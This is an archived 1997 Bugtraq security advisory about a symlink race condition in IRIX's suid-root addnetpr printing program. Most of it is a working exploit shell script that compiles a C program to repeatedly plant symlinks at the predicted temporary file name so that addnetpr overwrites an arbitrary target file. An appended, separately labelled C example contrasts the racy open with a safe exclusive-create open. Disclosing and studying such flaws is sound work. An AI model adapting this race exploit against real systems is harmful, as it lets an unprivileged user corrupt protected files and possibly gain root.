IRIX addnetpr race condition

Summary
Description: IRIX's addnetpr program has a symlink race condition that allows the clobbering of arbitrary files.
Author: Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
Compromise: causes addnetpr to write to arbitrary files. It is unclear whether it appends to or overwrites already existing files. Could probably lead to root access.
Vulnerable Systems: IRIX 5.3, 6.2
Date: 9 May 1997
Details

Date: Fri, 9 May 1997 06:33:46 +0900
From: Jaechul Choe <poison@COSMOS.KAIST.AC.KR>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Irix: misc


Wow, your works are so fertile and wonderful.
Let me add some stuff.

[. . .]


There was the same race condition in the program, /usr/lib/addnetpr, another
suid root program for printing.
Here is the exploit script for it.
But though I tried, it was hard to find the way to get root with it.
It can fill the target with the two arguments of addnetpr, but with some
messages I was unable to control.
And it will prompt the window asking for the root passwd to non-privileged (not
root, but IRIX-specific privileged) users.
Privileged users bypass the window and can run the race.

Tested on both IRIX 5.3 and 6.2.

---------------)<-----------cut expnetpr.sh ---------------)<----------------

#!/bin/sh

PROG="`basename $0`"
if [ $# -ne 1 ]; then
        echo "Usage: $PROG <target>"
        exit 1
fi

cat > expnetpr.c << _CREDIT_TO_ZOMO_
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        /* writable buffer: mktemp() fills in the XXXXXX in place */
        char template[] = "/var/tmp/printersXXXXXX";
        char *target;
        int pid;

        /* predict the temp-file name addnetpr is going to use */
        target = mktemp(template);

        if ((pid = fork()) > 0) {
                /* parent: give the child time to start, then run addnetpr */
                sleep(3);
                umask(0);
                execl("/usr/lib/addnetpr", "addnetpr", "localhost", "+",
                      (char *)0);
        }
        else
                /* child: keep re-pointing the predicted name at the target */
                while (1) {
                        symlink(argv[1], target);
                        unlink(target);
                }

        return 0;
}
_CREDIT_TO_ZOMO_
/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
        echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has been installed from the IDO"
        exit 1
fi

# retry the race until the target shows the effect
while true
do
        ./expnetpr $1 &
        PID=$!
        sleep 15
        ls -al $1
        killall expnetpr
        killall addnetpr
done

--------------------)<------------ cut ---------------)<-------------------
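The root cause the post describes, a privileged program opening a predictable name under /var/tmp that someone else can swap for a symlink, is shown below in an added C example that is not part of the original post or of IRIX: the racy O_CREAT open beside the atomic O_CREAT|O_EXCL open that refuses a planted symlink, exercised against a constructed victim file in a throwaway directory. The function names, the printersAAAAAA name and the /tmp demo directory are assumptions made for the demo.

```c
#define _XOPEN_SOURCE 700   /* declares mkdtemp() */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Racy: the name was chosen earlier (mktemp-style) and O_CREAT without
 * O_EXCL follows whatever symlink now sits at that path, as addnetpr did. */
int open_tmp_racy(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Safe: O_CREAT|O_EXCL is atomic and POSIX mandates EEXIST when the path is
 * a symlink (even a dangling one), so the link's target is never touched. */
int open_tmp_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed scenario: a victim file plus a symlink planted at the "predicted"
 * temp name. Returns 1 if the racy open truncates the victim while the safe
 * open fails with EEXIST, else 0. Removes the directory it creates. */
int demo_symlink_race(void)
{
    char dir[] = "/tmp/addnetpr-demoXXXXXX", victim[64], planted[64];
    struct stat st; int fd, ok = 0;

    if (mkdtemp(dir) == NULL) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(planted, sizeof planted, "%s/printersAAAAAA", dir);
    fd = open(victim, O_WRONLY | O_CREAT, 0644);
    if (fd >= 0 && write(fd, "secret", 6) == 6 && close(fd) == 0 &&
        symlink(victim, planted) == 0) {
        fd = open_tmp_racy(planted);          /* follows the planted link */
        if (fd >= 0) close(fd);
        int clobbered = stat(victim, &st) == 0 && st.st_size == 0;
        int refused = open_tmp_safe(planted) < 0 && errno == EEXIST;
        ok = clobbered && refused;
    }
    unlink(planted); unlink(victim); rmdir(dir);
    return ok;
}

int main(void)
{
    printf("racy open clobbered, safe open refused: %d\n", demo_symlink_race());
    return 0;
}
```

The same atomic-creation property is what mkstemp() gives for free, which is why it replaced mktemp() in later Unix libraries.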


This page is part of Fyodor's exploit world.